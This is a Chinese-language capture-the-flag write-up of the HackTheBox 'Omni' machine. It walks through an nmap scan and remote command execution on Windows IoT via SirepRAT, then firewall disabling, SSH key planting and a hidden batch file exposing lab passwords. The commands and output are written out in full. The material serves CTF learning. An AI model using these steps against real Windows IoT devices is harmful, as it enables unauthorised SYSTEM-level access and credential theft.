image-20200824204745056

recon:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 02:29 EDT
Nmap scan report for omni.htb (10.129.4.172)
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/23%Time=5F420CB4%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.40 seconds

135端口用impacket-rpcdump试了下没找到啥有用的信息(可能我漏掉了),8080端口显示的是Windows Device Portal,谷歌一下发现是windows IoT,再谷歌一下相关的exploit找到了这个:https://github.com/SafeBreach-Labs/SirepRAT

下载下来试了一下果然可以

1
2
3
4
5
6
7
# root @ kali in ~/hackthebox/machines/omni/SirepRAT on git:master x [8:54:45] 
$ python2 SirepRAT.py omni.htb LaunchCommandWithOutput --as_logged_on_user --return_output --cmd "C:\\Windows\\System32\\cmd.exe" --args "/c echo {{userprofile}} && hostname" --v
---------
C:\Data\Users\DefaultAccount
omni

---------

事实上如果不加上--as_logged_on_user的话是以system权限执行命令的。

1
2
3
4
5
6
7
# root @ kali in ~/hackthebox/machines/omni/SirepRAT on git:master x [8:59:54] 
$ python2 SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\\Windows\\System32\\cmd.exe" --args "/c echo {{userprofile}} && hostname" --v
---------
C:\Data\Users\System
omni

---------

到这里我以为故事就结束了,但是想想可能没那么简单,后来事实证明确实不简单。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# root @ kali in ~/hackthebox/machines/omni/SirepRAT on git:master x [9:01:26] C:130
$ python2 SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\\Windows\\System32\\cmd.exe" --args "/c type c:\\data\\users\\administrator\\root.txt" --v
---------
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS>
</Props>
</Obj>
</Objs>
---------

root.txt和user.txt都是以powershell的SecureString来存储的,查阅了一下资料得知可以用以下命令来解密:

1
2
$cred = Import-CliXml -Path c:\data\Users\administrator\user.txt
echo $cred.GetNetworkCredential().Password

然而尝试了很多次都不成功。后来在这里卡住了很久,后来发现用户app 属于sshd user组,所以就dir c:\sshd.exe /s /b 找到sshd.exe的目录,执行之后将openssh服务跑起来,再次扫描端口发现不存在,再次执行netsh Advfirewall set allprofiles state off 将防火墙关闭,再将ssh key写入到用户目录下,终于可以连接上ssh了。然而上面的那个命令还是报错,显示ConvertFrom-SecureString : Error occurred during a cryptographic operation.,谷歌之后发现是因为IoT系统没有系统预设的key,所以要事先设定一个key才能进行 ConvertFrom-SecureString 的操作。然而我并不知道key是什么,再次陷入僵局。

下面是正解:

执行dir c:\ /ah /s 寻找c盘的所有隐藏文件,发现在c:\Program Files\WindowsPowerShell\Modules\PackageManagement 下面有一个r.bat文件,内容是app和administrator的登录凭证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# root @ kali in ~/hackthebox/machines/omni/SirepRAT on git:master x [9:14:26] C:130
$ python2 SirepRAT.py omni.htb LaunchCommandWithOutput --as_logged_on_user --return_output --cmd "C:\\Windows\\System32\\cmd.exe" --args "/c type c:\\\"Program Files\"\\WindowsPowershell\\Modules\\PackageManagement\\r.bat" --v
---------
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT
---------

使用以上凭证登陆ssh(不要用证书),就可以正常解密flag文件了(这让我十分疑惑不解)

其实可能登陆ssh也并不是预期解法,预期解法应该是用以上凭证登陆8080端口的网站,然后用网站上的run process命令反弹一个shell回来进行解密。